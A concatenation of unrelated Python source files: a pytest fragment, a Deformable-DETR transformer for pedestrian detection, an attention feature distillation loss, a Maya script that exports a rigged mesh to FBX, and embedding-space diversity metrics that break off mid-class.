    assert m2r[0].ModelCode == 'model2'
    # The relation is directional: one hit from the parent, none from the child.
    m1rel = setup.odmread.getRelatedModels(code='converter')
    assert len(m1rel) == 1
    m2rel = setup.odmread.getRelatedModels(code='model2')
    assert len(m2rel) == 0
@skipif(True, reason='Needs data')
def test_createSimulation(setup):
    """Read-back smoke test; skipped until fixture data exists."""
    assert len(setup.odmread.getAllSimulations()) == 1
|
<reponame>Hatmm/PED-DETR-for-Pedestrian-Detection<gh_stars>10-100
# ------------------------------------------------------------------------
# Modified by <NAME>
# Modified from Deformable-DETR (https://github.com/fundamentalvision/Deformable-DETR)
# Modified from DETR (https://github.com/facebookresearch/detr)
# Copyright (c) 2020 SenseTime. All Rights Reserved.
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
# ------------------------------------------------------------------------
from typing import Optional
from dqrf.ops.functions.local_attn import MultiHeadAttention
from dqrf.ops.functions.ms_deform_attn import SamplingAttention_RA, SamplingEncAttention, SamplingAttention_dec
import torch
from torch import nn, Tensor
from torch.nn.init import xavier_uniform_, constant_, normal_
from dqrf.utils.box_ops import box_cxcywh_to_xyxy, generalized_box_iou
from dqrf.utils.utils import _get_clones, _get_activation_fn
class Transformer(nn.Module):
    """Deformable-DETR-style transformer (DQRF variant): multi-level feature
    maps are flattened, encoded with sampling attention, then decoded against
    a set of learned queries."""

    def __init__(self, cfg):
        super().__init__()
        # Pull every hyperparameter from the config node.
        d_model = cfg.MODEL.DQRF_DETR.HIDDEN_DIM
        nhead = cfg.MODEL.DQRF_DETR.NHEAD
        num_decoder_layers = cfg.MODEL.DQRF_DETR.NUM_DECODER_LAYERS
        num_encoder_layers = cfg.MODEL.DQRF_DETR.NUM_ENCODER_LAYERS
        dim_feedforward = cfg.MODEL.DQRF_DETR.DIM_FEEDFORWARD
        activation = cfg.MODEL.DQRF_DETR.ACTIVATION
        dropout = cfg.MODEL.DQRF_DETR.DROPOUT
        # Intermediate decoder outputs are returned when aux loss is enabled.
        return_intermediate_dec = cfg.MODEL.DQRF_DETR.AUX_LOSS
        self.return_intermediate_dec = return_intermediate_dec
        num_feature_levels = cfg.MODEL.DQRF_DETR.NUM_FEATURE_LEVELS
        enc_sampling_points = cfg.MODEL.DQRF_DETR.ENC_SAMPLING_POINTS
        dec_sampling_points = cfg.MODEL.DQRF_DETR.DEC_SAMPLING_POINTS
        dense_query = cfg.MODEL.DQRF_DETR.DENSE_QUERY
        rectified_attention = cfg.MODEL.DQRF_DETR.RECTIFIED_ATTENTION
        # When True, decoder targets start as zeros instead of being split
        # off the query embedding (see forward()).
        self.zero_tgt = False
        # Gradient-checkpoint the FFN sub-blocks to save memory.
        checkpoint_enc_ffn = True
        checkpoint_dec_ffn = True
        self.d_model = d_model
        self.num_decoder_layers = num_decoder_layers
        encoder_layer = TransformerEncoderLayer(d_model, nhead, dim_feedforward,
                                                dropout, activation,
                                                enc_sampling_points=enc_sampling_points,
                                                checkpoint_ffn=checkpoint_enc_ffn,
                                                num_feature_levels=num_feature_levels)
        self.encoder = TransformerEncoder(encoder_layer, num_encoder_layers)
        decoder_layer = TransformerDecoderLayer(d_model, nhead, dim_feedforward, dropout, activation,
                                                num_feature_levels=num_feature_levels, dec_sampling_points=dec_sampling_points,
                                                checkpoint_ffn=checkpoint_dec_ffn, rectified_attention=rectified_attention)
        decoder_norm = nn.LayerNorm(d_model)
        self.decoder = TransformerDecoder(decoder_layer, num_decoder_layers, dense_query=dense_query, norm=decoder_norm, return_intermediate=return_intermediate_dec)
        self._reset_parameters()
        # Predicts initial (cx, cy, w, h) logits from the target embedding.
        # Created AFTER _reset_parameters() so the custom init below is not
        # overwritten by the generic xavier loop.
        self.sampling_cens = nn.Linear(d_model, 4)
        constant_(self.sampling_cens.weight.data, 0.)
        constant_(self.sampling_cens.bias.data, 0.)
        xavier_uniform_(self.sampling_cens.weight.data[:2], gain=1.0)
        # Biases for w/h logits start negative (small boxes after sigmoid).
        constant_(self.sampling_cens.bias.data[2:3], -2.0)
        constant_(self.sampling_cens.bias.data[3:4], -1.5)
        # constant_(self.sampling_cens.bias.data[2:], -2.0)
        # Learned per-level embedding added to the positional encoding.
        self.level_embed = nn.Parameter(torch.Tensor(num_feature_levels, d_model))
        normal_(self.level_embed)

    def _reset_parameters(self):
        """Xavier-init all matrix parameters, then let the sampling-attention
        modules run their own specialized init."""
        for p in self.parameters():
            if p.dim() > 1:
                nn.init.xavier_uniform_(p)
        for m in self.modules():
            if isinstance(m, (SamplingAttention_RA, SamplingEncAttention, SamplingAttention_dec)):
                m._reset_parameters()

    def get_valid_size(self, key_padding_mask, N_, H_, W_):
        """Count unpadded rows/cols per sample and the valid fraction of the
        (H_, W_) map.  Assumes True in the mask marks padding — confirm."""
        valid_H = torch.sum(~key_padding_mask[:, :, 0], 1)
        valid_W = torch.sum(~key_padding_mask[:, 0, :], 1)
        valid_size = torch.cat([valid_W.unsqueeze(-1), valid_H.unsqueeze(-1)], 1).view(N_, 2)
        size = torch.tensor([W_, H_], dtype=torch.float32, device=key_padding_mask.device)
        valid_scale = valid_size / size.view(1, 2)
        return valid_size, valid_scale

    def forward(self, srcs, masks, query_embed, pos_embeds):
        """Encode the per-level feature maps and decode the object queries.

        srcs/masks/pos_embeds are per-level lists; query_embed holds the
        learned query (and, unless zero_tgt, target) embeddings.
        """
        src_flatten = []
        mask_flatten = []
        lvl_pos_embed_flatten = []
        spatial_shapes = []
        valid_size_list = []
        valid_scale_list = []
        # Flatten each level's (bs, c, h, w) map to (bs, c, h*w) and tag its
        # positional encoding with the level embedding.
        for lvl, (src, mask, pos_embed) in enumerate(zip(srcs, masks, pos_embeds)):
            bs, c, h, w = src.shape
            spatial_shape = (h, w)
            spatial_shapes.append(spatial_shape)
            src = src.flatten(2)
            mask = mask.flatten(1)
            pos_embed = pos_embed.flatten(2)
            valid_size, valid_scale = self.get_valid_size(mask.view(bs, h, w), bs, h, w)
            valid_size_list.append(valid_size.view(bs, 1, 2))
            valid_scale_list.append(valid_scale.view(bs, 1, 2))
            lvl_pos_embed = pos_embed + self.level_embed[lvl].view(1, -1, 1)
            lvl_pos_embed_flatten.append(lvl_pos_embed)
            src_flatten.append(src)
            mask_flatten.append(mask)
        # Concatenate all levels along the flattened-pixel dimension.
        src_flatten = torch.cat(src_flatten, -1)
        mask_flatten = torch.cat(mask_flatten, -1)
        valid_sizes = torch.cat(valid_size_list, 1)
        valid_scales = torch.cat(valid_scale_list, 1)
        lvl_pos_embed_flatten = torch.cat(lvl_pos_embed_flatten, -1)
        # Bundle per-level geometry so the attention modules can un-flatten.
        spatial_shapes = (spatial_shapes, valid_sizes, valid_scales)
        memory = self.encoder(src_flatten, src_key_padding_mask=mask_flatten, pos=lvl_pos_embed_flatten,
                              spatial_shape=spatial_shapes)
        bs, c = memory.shape[:2]
        # L, E
        if not self.zero_tgt:
            # query_embed carries both the positional query and the initial
            # target; split and broadcast each across the batch.
            query_embed, tgt = torch.split(query_embed, c, dim=1)
            query_embed = query_embed.unsqueeze(1).expand(-1, bs, -1)
            tgt = tgt.unsqueeze(1).expand(-1, bs, -1)
        else:
            tgt = torch.zeros_like(query_embed)
            query_embed = query_embed.unsqueeze(1).expand(-1, bs, -1)
        # Initial (unsigmoided) box centers predicted from the targets.
        pos_centers = self.sampling_cens(tgt)
        # [#dec, #query, bs, dim] or [#query, bs, dim]
        hs, inter_ps, dec_attns = self.decoder(tgt, memory, memory_key_padding_mask=mask_flatten,
                                               pos=lvl_pos_embed_flatten, query_pos=query_embed,
                                               pos_centers=pos_centers, spatial_shape=spatial_shapes,
                                               )
        if self.return_intermediate_dec:
            return hs.transpose(1, 2), memory, inter_ps.transpose(1, 2), dec_attns
        else:
            return hs.transpose(0, 1), memory, inter_ps.transpose(0, 1), dec_attns
class TransformerEncoder(nn.Module):
    """A stack of identical encoder layers applied in sequence."""

    def __init__(self, encoder_layer, num_layers):
        super().__init__()
        # Deep-copy the prototype layer num_layers times.
        self.layers = _get_clones(encoder_layer, num_layers)
        self.num_layers = num_layers

    def forward(self, src, src_key_padding_mask, pos, spatial_shape):
        """Run src through every layer, threading the same padding mask,
        positional encoding, and spatial-shape metadata into each one."""
        out = src
        for enc_layer in self.layers:
            out = enc_layer(out,
                            src_key_padding_mask=src_key_padding_mask,
                            pos=pos,
                            spatial_shape=spatial_shape)
        return out
class TransformerDecoder(nn.Module):
    """Stack of decoder layers with iterative sampling-center refinement.

    Two optional behaviors:
      * ``dense_query``: per-layer self-attention masks are rebuilt from the
        current box predictions so each query attends only to its 100 nearest
        (by GIoU) queries.
      * ``bbox_embed`` (attached externally after construction): refines the
        sampling centers after every layer, with the update detached from the
        gradient graph (Deformable-DETR-style iterative refinement).
    """
    def __init__(self, decoder_layer, num_layers, dense_query, norm=None, return_intermediate=False):
        super().__init__()
        self.layers = _get_clones(decoder_layer, num_layers)
        self.num_layers = num_layers
        self.norm = norm
        self.return_intermediate = return_intermediate
        # Assigned from outside (e.g. by the detection head) to enable
        # per-layer center refinement; stays None otherwise.
        self.bbox_embed = None
        self.dense_query = dense_query
    def forward(self, tgt, memory,
                tgt_mask: Optional[Tensor] = None,
                memory_mask: Optional[Tensor] = None,
                tgt_key_padding_mask: Optional[Tensor] = None,
                memory_key_padding_mask: Optional[Tensor] = None,
                pos: Optional[Tensor] = None,
                query_pos: Optional[Tensor] = None,
                pos_centers=None, spatial_shape=None):
        """Run all decoder layers.

        Returns either (stacked per-layer outputs, centers, attentions) when
        ``return_intermediate`` is set, or the final (output, pos_centers,
        dec_attn) triple otherwise.
        """
        output = tgt
        intermediate = []
        intermediate_centers = []
        intermediate_dec_attns = []
        # intermediate_tgt = []
        for lvl, layer in enumerate(self.layers):
            # intermediate_tgt.append(output)
            if self.dense_query is True: # work around for dense query implementation
                # Rebuild the self-attention mask from current box predictions:
                # each query may only attend to its 100 closest queries by GIoU.
                outputs_coord = pos_centers.permute(1, 0, 2).sigmoid()
                nquery = outputs_coord.size(1)
                tgt_masks = []
                for pred in outputs_coord:
                    tgt_masks_ = torch.zeros((nquery, nquery), device=pos_centers.device)
                    boxes = box_cxcywh_to_xyxy(pred)
                    giou_score = 1 - generalized_box_iou( boxes, boxes)
                    score = giou_score
                    top_idx = torch.sort(score, dim=-1)[1][:, :100] # returns a longtensor
                    # _, top_idx = torch.topk(score, k=100, largest=False, sorted=True,dim=-1)#[nquery, topk] #torch.sort is faster on GPU
                    tgt_masks_.scatter_(1, top_idx, 1.)
                    tgt_masks.append(tgt_masks_)
                # NOTE(review): the repeat factor hardcodes 8 attention heads —
                # TODO confirm it matches the layer's nhead.
                tgt_mask = torch.stack(tgt_masks, dim=0).repeat_interleave(8, 0)
            output, dec_attn = layer(output, memory, tgt_mask=tgt_mask,
                           memory_mask=memory_mask,
                           tgt_key_padding_mask=tgt_key_padding_mask,
                           memory_key_padding_mask=memory_key_padding_mask,
                           pos=pos, query_pos=query_pos,
                           pos_centers=pos_centers,
                           spatial_shape=spatial_shape)
            if self.return_intermediate:
                intermediate.append(self.norm(output))
                intermediate_centers.append(pos_centers)
                intermediate_dec_attns.append(dec_attn)
            if self.bbox_embed is not None:
                # Iterative refinement: predict a center delta and detach so
                # gradients do not flow through the refinement chain.
                tmp = self.bbox_embed[lvl](self.norm(output))
                new_pos_centers = tmp + pos_centers
                pos_centers = new_pos_centers.detach()
        if self.norm is not None:
            output = self.norm(output)
            if self.return_intermediate:
                # Replace the last (already normed) entry with the final output.
                intermediate.pop()
                intermediate.append(output)
        if self.return_intermediate:
            return torch.stack(intermediate), torch.stack(intermediate_centers), torch.stack(intermediate_dec_attns)#torch.stack(intermediate_tgt)
        return output, pos_centers, dec_attn
class TransformerEncoderLayer(nn.Module):
    """Encoder layer: sampling-based self-attention followed by a
    position-wise feed-forward network (pre-norm inside ``wrap1``).

    When ``checkpoint_ffn`` is set, the FFN is gradient-checkpointed during
    training to trade computation for memory.
    """
    def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1,
                 activation="relu", enc_sampling_points=1, checkpoint_ffn=False,
                 num_feature_levels=4):
        super().__init__()
        self.self_attn = SamplingEncAttention(d_model, dec_sampling_heads=nhead, dec_sampling_points=enc_sampling_points, feature_levels=num_feature_levels)
        self.linear1 = nn.Linear(d_model, dim_feedforward)
        self.linear2 = nn.Linear(dim_feedforward, d_model)
        self.norm1 = nn.LayerNorm(d_model)
        self.norm2 = nn.LayerNorm(d_model)
        self.dropout = nn.Dropout(dropout)
        self.dropout1 = nn.Dropout(dropout)
        self.dropout2 = nn.Dropout(dropout)
        self.activation = _get_activation_fn(activation)
        self.checkpoint_ffn = checkpoint_ffn

    def with_pos_embed(self, tensor, pos: Optional[Tensor]):
        # Add the positional embedding when one is provided.
        return tensor if pos is None else tensor + pos

    def forward(self, src, src_key_padding_mask, pos, spatial_shape):
        src2 = self.self_attn(src, pos=pos, key_padding_mask=src_key_padding_mask, spatial_shape=spatial_shape)
        src = src + self.dropout1(src2)

        def wrap1(src):
            # src arrives as (N, C, S); LayerNorm/Linear act on the last dim,
            # so permute to (S, N, C), run the FFN, then restore (N, C, S).
            N_, C_, S_ = src.shape
            src = src.permute(2, 0, 1)
            src = self.norm1(src)
            src2 = self.linear2(self.dropout(self.activation(self.linear1(src))))
            src = src + self.dropout2(src2)
            src = self.norm2(src)
            src = src.view(S_, N_, C_).permute(1, 2, 0)
            return src

        # BUGFIX: the original condition was `self.train() == True`, which is
        # always False (nn.Module.train() returns self) and, worse, forcibly
        # switched the module into training mode on every forward pass —
        # corrupting eval-mode behavior of dropout/BN. `self.training` is the
        # correct read-only flag.
        if self.checkpoint_ffn and self.training:
            # Recompute the FFN activations in the backward pass instead of
            # storing them: trades computation for memory.
            src = torch.utils.checkpoint.checkpoint(wrap1, src)
        else:
            src = wrap1(src)
        return src
class TransformerDecoderLayer(nn.Module):
    """Decoder layer: standard query self-attention, sampling-based
    cross-attention into the encoder memory, then a feed-forward network.

    When ``checkpoint_ffn`` is set, the FFN is gradient-checkpointed during
    training to trade computation for memory.
    """
    def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1,
                 activation="relu", dec_sampling_points=8, num_feature_levels=4, checkpoint_ffn=False,
                 rectified_attention=False
                 ):
        super().__init__()
        self.self_attn = nn.MultiheadAttention(d_model, nhead, dropout=dropout)
        # self.self_attn = MultiHeadAttention(d_model, nhead, dropout)
        # Cross-attention flavor is chosen once at construction time.
        if rectified_attention:
            self.multihead_attn = SamplingAttention_RA(d_model, dec_sampling_points=dec_sampling_points,
                                                       num_feature_levels=num_feature_levels)
        else:
            self.multihead_attn = SamplingAttention_dec(d_model, dec_sampling_points=dec_sampling_points,
                                                        num_feature_levels=num_feature_levels)
        self.linear1 = nn.Linear(d_model, dim_feedforward)
        self.dropout = nn.Dropout(dropout)
        self.linear2 = nn.Linear(dim_feedforward, d_model)
        self.norm1 = nn.LayerNorm(d_model)
        self.norm2 = nn.LayerNorm(d_model)
        self.norm3 = nn.LayerNorm(d_model)
        self.dropout1 = nn.Dropout(dropout)
        self.dropout2 = nn.Dropout(dropout)
        self.dropout3 = nn.Dropout(dropout)
        self.activation = _get_activation_fn(activation)
        self.checkpoint_ffn = checkpoint_ffn

    def with_pos_embed(self, tensor, pos: Optional[Tensor]):
        # Add the positional embedding when one is provided.
        return tensor if pos is None else tensor + pos

    def forward(self, tgt, memory,
                tgt_mask: Optional[Tensor] = None,
                memory_mask: Optional[Tensor] = None,
                tgt_key_padding_mask: Optional[Tensor] = None,
                memory_key_padding_mask: Optional[Tensor] = None,
                pos: Optional[Tensor] = None,
                query_pos: Optional[Tensor] = None,
                pos_centers=None, spatial_shape=None):
        """Returns (updated queries, cross-attention weights)."""
        # Self-attention among queries (positions added to q/k, not values).
        q = k = self.with_pos_embed(tgt, query_pos)
        tgt2 = self.self_attn(q, k, tgt, attn_mask=tgt_mask, key_padding_mask=tgt_key_padding_mask)[0]
        # tgt2 = self.self_attn(q, k, tgt, attn_mask=tgt_mask, mask=tgt_key_padding_mask)[0]
        tgt = tgt + self.dropout1(tgt2)
        tgt = self.norm1(tgt)
        # Sampling-based cross-attention into the flattened encoder memory.
        tgt2, dec_attn = self.multihead_attn(tgt, query_pos,
                                             memory, pos,
                                             key_padding_mask=memory_key_padding_mask,
                                             pos_centers=pos_centers, spatial_shape=spatial_shape)
        tgt = tgt + self.dropout2(tgt2)

        def wrap2(tgt):
            tgt = self.norm2(tgt)
            tgt2 = self.linear2(self.dropout(self.activation(self.linear1(tgt))))
            tgt = tgt + self.dropout3(tgt2)
            tgt = self.norm3(tgt)
            return tgt

        # BUGFIX: the original condition was `self.train() == True`, which is
        # always False (nn.Module.train() returns self) and forcibly switched
        # the module into training mode during forward. `self.training` is the
        # correct read-only flag.
        if self.checkpoint_ffn and self.training:
            tgt = torch.utils.checkpoint.checkpoint(wrap2, tgt)
        else:
            tgt = wrap2(tgt)
        return tgt, dec_attn
def build_transformer(cfg):
    """Factory: construct the Transformer from a config object."""
    return Transformer(cfg)
|
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import torch
import torch.nn as nn
import torch.nn.functional as F
import math
'''
In the original paper, AFD is one of components of AFDS.
AFDS: Attention Feature Distillation and Selection
AFD: Attention Feature Distillation
AFS: Attention Feature Selection
We find the original implementation of attention is unstable, thus we replace it with a SE block.
'''
class AFD(nn.Module):
    '''
    Pay Attention to Features, Transfer Learn Faster CNNs
    https://openreview.net/pdf?id=ryxyCeHtPB

    Distills student feature maps toward teacher feature maps, weighting each
    channel by an attention score computed (SE-block style) from the pooled
    teacher map.
    '''
    def __init__(self, in_channels, att_f):
        """
        :param in_channels: channel count of the feature maps to distill
        :param att_f: bottleneck ratio for the SE-style attention MLP
        """
        super(AFD, self).__init__()
        mid_channels = int(in_channels * att_f)

        # 1x1-conv squeeze-excite block producing one attention logit per channel.
        self.attention = nn.Sequential(*[
            nn.Conv2d(in_channels, mid_channels, 1, 1, 0, bias=True),
            nn.ReLU(inplace=True),
            nn.Conv2d(mid_channels, in_channels, 1, 1, 0, bias=True)
        ])

        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
                if m.bias is not None:
                    nn.init.constant_(m.bias, 0)

    def forward(self, fm_s, fm_t, eps=1e-6):
        """
        :param fm_s: student feature map (B x C x H x W)
        :param fm_t: teacher feature map (B x C x H x W)
        :param eps: numerical-stability constant for the norm division
        :return: scalar distillation loss
        """
        fm_t_pooled = F.adaptive_avg_pool2d(fm_t, 1)
        rho = self.attention(fm_t_pooled)
        # rho = F.softmax(rho.squeeze(), dim=-1)
        # BUGFIX: squeeze only the spatial dims. A bare .squeeze() also dropped
        # the batch dimension when B == 1, so the following sum(dim=1) raised.
        rho = torch.sigmoid(rho.squeeze(-1).squeeze(-1))
        rho = rho / torch.sum(rho, dim=1, keepdim=True)  # per-sample weights summing to 1

        # Compare L2-normalized feature maps so only direction matters.
        fm_s_norm = torch.norm(fm_s, dim=(2,3), keepdim=True)
        fm_s = torch.div(fm_s, fm_s_norm+eps)
        fm_t_norm = torch.norm(fm_t, dim=(2,3), keepdim=True)
        fm_t = torch.div(fm_t, fm_t_norm+eps)

        # Channel-weighted MSE, summed over channels, averaged over the batch.
        loss = rho * torch.pow(fm_s-fm_t, 2).mean(dim=(2,3))
        loss = loss.sum(1).mean(0)

        return loss
# class AFD(nn.Module):
# '''
# Pay Attention to Features, Transfer Learn Faster CNNs
# https://openreview.net/pdf?id=ryxyCeHtPB
# '''
# def __init__(self, chw):
# super(AFD, self).__init__()
# c, h, w = chw
# self.weight1 = nn.Parameter(math.sqrt(2.0) / math.sqrt(h*w) * torch.randn(h, h*w))
# self.bias1 = nn.Parameter(torch.zeros(h))
# self.weight2 = nn.Parameter(math.sqrt(2.0) / math.sqrt(h) * torch.randn(h))
# self.bias2 = nn.Parameter(torch.zeros(c))
# def forward(self, fm_s, fm_t, eps=1e-6):
# b, c, h, w = fm_t.size()
# fm_t_flatten = fm_t.view(fm_t.size(0), fm_t.size(1), -1)
# weight1 = torch.stack([self.weight1.t()]*b, dim=0)
# bias1 = self.bias1.unsqueeze(0).unsqueeze(1)
# rho = F.relu(torch.bmm(fm_t_flatten, weight1) + bias1)
# weight2 = self.weight2.view(-1, 1)
# bias2 = self.bias2.unsqueeze(0)
# rho = torch.mm(rho.view(-1, rho.size(2)), weight2).view(b,c) + bias2
# # rho = F.softmax(rho, dim=-1)
# rho = torch.sigmoid(rho)
# rho = rho / torch.sum(rho, dim=1, keepdim=True)
# # print(rho)
# fm_s_norm = torch.norm(fm_s, dim=(2,3), keepdim=True)
# fm_s = torch.div(fm_s, fm_s_norm+eps)
# fm_t_norm = torch.norm(fm_t, dim=(2,3), keepdim=True)
# fm_t = torch.div(fm_t, fm_t_norm+eps)
# loss = rho * torch.pow(fm_s-fm_t, 2).mean(dim=(2,3))
# loss = loss.sum(1).mean(0)
# return loss |
#-------------------------------------------------------------------------------
# Name: maya_save_fbx.py
# Purpose:     run this script in Maya. Assembles the predicted rig (.txt) and obj
# mesh together to a FBX file
# RigNet Copyright 2020 University of Massachusetts
# RigNet is made available under General Public License Version 3 (GPLv3), or under a Commercial License.
# Please see the LICENSE README.txt file in the main directory for more information and instruction on using and licensing RigNet.
#-------------------------------------------------------------------------------
import maya
import maya.standalone
maya.standalone.initialize(name='python')
import maya.OpenMaya as om
import maya.cmds as cmds
import maya.mel as mel
import numpy as np
import pymel.core as pm
import os
import glob
def loadInfo(info_name, geo_name):
    """Parse a RigNet rig-info (.txt) file and build the skeleton plus skin
    weights on ``geo_name`` in the current Maya scene.

    The file contains whitespace-separated records:
        joints <name> <x> <y> <z>
        root   <name>
        hier   <parent> <child>
        skin   <vtx_id> <joint> <weight> [<joint> <weight> ...]

    :param info_name: path to the rig info text file
    :param geo_name: name of the geometry to bind
    :return: (root joint name, {joint name: [x, y, z]})
    :raises ValueError: if the file contains no 'root' record
    """
    joint_pos = {}
    joint_hier = {}
    joint_skin = []
    root_name = None
    # Context manager so the file handle is closed even if parsing or a Maya
    # command fails (the original leaked the handle on exceptions).
    with open(info_name, 'r') as f_info:
        for line in f_info:
            word = line.split()
            if not word:
                continue  # tolerate blank lines
            if word[0] == 'joints':
                joint_pos[word[1]] = [float(word[2]), float(word[3]), float(word[4])]
            if word[0] == 'root':
                root_pos = joint_pos[word[1]]
                root_name = word[1]
                cmds.joint(p=(root_pos[0], root_pos[1], root_pos[2]), name=root_name)
            if word[0] == 'hier':
                if word[1] not in joint_hier.keys():
                    joint_hier[word[1]] = [word[2]]
                else:
                    joint_hier[word[1]].append(word[2])
            if word[0] == 'skin':
                skin_item = word[1:]
                joint_skin.append(skin_item)
    if root_name is None:
        # Previously this fell through to an opaque NameError below.
        raise ValueError('no "root" record found in {}'.format(info_name))
    # Breadth-first creation of child joints; selecting the parent first makes
    # cmds.joint parent the new joint to it.
    this_level = [root_name]
    while this_level:
        next_level = []
        for p_node in this_level:
            if p_node in joint_hier.keys():
                for c_node in joint_hier[p_node]:
                    cmds.select(p_node, r=True)
                    child_pos = joint_pos[c_node]
                    cmds.joint(p=(child_pos[0], child_pos[1], child_pos[2]), name=c_node)
                    next_level.append(c_node)
        this_level = next_level
    # Orient the whole chain and bind the mesh to the skeleton.
    cmds.joint(root_name, e=True, oj='xyz', sao='yup', ch=True, zso=True)
    cmds.skinCluster(root_name, geo_name)
    # Apply per-vertex skin weights (joint/weight pairs), then prune tiny
    # influences without renormalizing.
    for i in range(len(joint_skin)):
        vtx_name = geo_name + '.vtx[' + joint_skin[i][0] + ']'
        transValue = []
        for j in range(1, len(joint_skin[i]), 2):
            transValue_item = (joint_skin[i][j], float(joint_skin[i][j + 1]))
            transValue.append(transValue_item)
        cmds.skinPercent('skinCluster1', vtx_name, transformValue=transValue)
    cmds.skinPercent('skinCluster1', geo_name, pruneWeights=0.01, normalize=False)
    return root_name, joint_pos
def getGeometryGroups():
    """Return candidate geometry names in the current Maya scene.

    Prefers names derived from '*ShapeOrig' nodes (created when geometry is
    skinned); falls back to all surface shapes when none exist.
    """
    # we can also use cmds.ls(geo, l=True)[0].split("|")[0]
    # to get the upper level node name, but stick on this way for now
    shapes = cmds.ls(type='surfaceShape')
    geo_list = [shape.replace('ShapeOrig', '')
                for shape in shapes if 'ShapeOrig' in shape]
    if geo_list:
        return geo_list
    return cmds.ls(type='surfaceShape')
if __name__ == '__main__':
    # Entry point: run under mayapy as `mayapy maya_save_fbx.py <rig_info.txt>`.
    # The .obj mesh and the .fbx output paths are derived from the rig-info path.
    #model_id = "17872"
    # model_id = "smith"
    # print model_id
    # info_name = "/home/junjie/workspace/RigNet/quick_start/11814_ori_rig.txt"
    # obj_name = info_name.replace("_ori_rig.txt", "_ori.obj").replace(".txt", ".obj").replace("rig_info_remesh", "obj_remesh").replace("rig_info", "obj")
    # out_name = os.path.basename(info_name).replace("_ori", "_gen").replace(".txt", ".fbx")
    # print(info_name, obj_name)
    # print(out_name)
    import sys
    info_name = sys.argv[1]
    obj_name = info_name.replace(".txt", ".obj")
    out_name = info_name.replace(".txt", ".fbx")
    # info_name = "Ch14_nonPBR.txt"
    # obj_name = "Ch14_nonPBR.obj"
    # out_name = obj_name.split('.')[0] + "_out.fbx"
    # obj_name = ""
    # obj_name = 'D:\\{:s}_ori.obj'.format(model_id)
    # info_name = 'D:\\{:s}_ori_rig.txt'.format(model_id)
    # out_name = 'D:\\{:s}.fbx'.format(model_id)
    # import obj
    # Start from a clean scene, then load the mesh.
    cmds.file(new=True,force=True)
    cmds.file(obj_name, o=True)
    # import info
    # Build the skeleton and skinning on the first geometry group found.
    geo_list = getGeometryGroups()
    root_name, _ = loadInfo(info_name, geo_list[0])
    # export fbx
    pm.mel.FBXExport(f=out_name)
|
<gh_stars>1-10
import torch
from pytorch_lightning.metrics import Metric
from torch.nn import functional as F
from analysis.downstream_embeddings import LocalScanDownstreamEmbeddings
from models.pretraining.pretraining_utils import EmbeddingsData
def compute_std_from_sample_vars(sample_means, sample_vars):
    """Total std across samples via the law of total variance:
    mean within-sample variance plus (when more than one sample is present)
    the variance of the per-sample means."""
    total_var = sample_vars.mean()
    if sample_means.shape[0] > 1:
        total_var = total_var + sample_means.var()
    return torch.sqrt(total_var)
def compute_avg_dist_to_mean(values):
    """Average L2 distance of each row to the column-wise centroid.

    :param values: (B x d)
    :return: scalar tensor
    """
    centroid = values.mean(dim=0, keepdim=True)
    dists = F.pairwise_distance(values, centroid, p=2)
    return dists.mean()
class GlobalEmbeddingSpaceMetrics:
    """
    -- across sample diversity --
    -> ch_std
    -> dist_emb2emb (dist_emb2emb__batch_estimate)
    """

    def __init__(self, prefix, compute_cov=False):
        self.compute_cov = compute_cov
        self.prefix = prefix + '/'
        self.embeddings = []                      # list of (B x d) batches
        self.emb2emb_dists__batch_estimate = []   # per-batch scalar
        self.uniformity = []                      # per-batch scalar

    def update(self, embeddings):
        """Accumulate one batch of global embeddings.

        :param embeddings: B x d
        """
        if embeddings is None:
            return
        self.embeddings.append(embeddings)
        # ----- avg pairwise distance within the batch (incl. self-distances) -----
        pair_dists = torch.cdist(embeddings.unsqueeze(0), embeddings.unsqueeze(0), p=2).squeeze(0)  # (B x B)
        self.emb2emb_dists__batch_estimate.append(pair_dists.mean())
        # Uniformity (log taken later at compute time), see
        # https://arxiv.org/pdf/2005.10242.pdf / https://arxiv.org/pdf/2105.00470.pdf
        self.uniformity.append(torch.exp(-2 * pair_dists.pow(2)).mean())

    def compute(self, compute_dist_emb2emb=False):
        """Aggregate all accumulated batches into a metrics dict."""
        if not self.embeddings:
            return {}
        all_emb = torch.cat(self.embeddings, dim=0)                                 # (B_total x d)
        batch_dists = torch.stack(self.emb2emb_dists__batch_estimate, dim=0)        # (N_batch)
        batch_uniformity = torch.stack(self.uniformity, dim=0)                      # (N_batch)
        metrics = {
            self.prefix + "ch_std": all_emb.std(dim=0).mean(),
            self.prefix + "uniformity": batch_uniformity.mean().log(),
            self.prefix + "dist_emb2emb__batch_estimate": batch_dists.mean()
        }
        if compute_dist_emb2emb:
            # Exact pairwise distance over the full accumulated set (O(B_total^2)).
            full_cdist = torch.cdist(all_emb.unsqueeze(0), all_emb.unsqueeze(0), p=2).squeeze(0)
            metrics[self.prefix + "dist_emb2emb"] = full_cdist.mean()
        if self.compute_cov:
            num, dim = all_emb.size()
            off_diag = ~torch.eye(dim, device=all_emb.device).bool()
            centered = all_emb - all_emb.mean(dim=0, keepdim=True)     # (B x d)
            cov = (centered.T @ centered) / (num - 1)                  # (d x d)
            metrics[self.prefix + "cov_offdiagonal"] = cov[off_diag].pow_(2).sum() / dim
        return metrics
class LocalEmbeddingSpaceMetrics:
    """
    Diversity statistics over *local* (per-token) embeddings, respecting a
    validity mask per sample.

    Note: __std means the std of that value btw. different samples, the value itself is then the mean of different samples
    -- within sample diversity --
    -> ch_std_per_sample (+ ch_std_per_sample__std)
    -> dist_emb2cent (+ dist_emb2cent_dist__std)
    -> dist_emb2emb (+ dist_emb2emb__weighted)
    -- across sample diversity --
    -> ch_std
    -> ch_std_sample_centroids
    -> dist_cent2cent (dist_cent2cent__batch_estimate)
    """
    def __init__(self, prefix, compute_cov=False):
        # When True, additionally track off-diagonal covariance statistics
        # (noticeably more expensive: per-sample d x d matrices).
        self.compute_cov = compute_cov
        self.prefix = prefix + '/'
        self.means = []  # (B x d) per-sample centroids
        self.vars = []  # (B x d) per-sample per-channel variances
        self.cov_offdiagonal_per_sample = []  # (B)
        self.cov_offdiagonal = []  # (1)
        self.per_sample_uniformity = []  # (B)
        self.emb2cent_dists__means = []  # (1)
        self.emb2cent_dists__vars = []  # (1)
        self.emb2emb_dists = []  # (1)
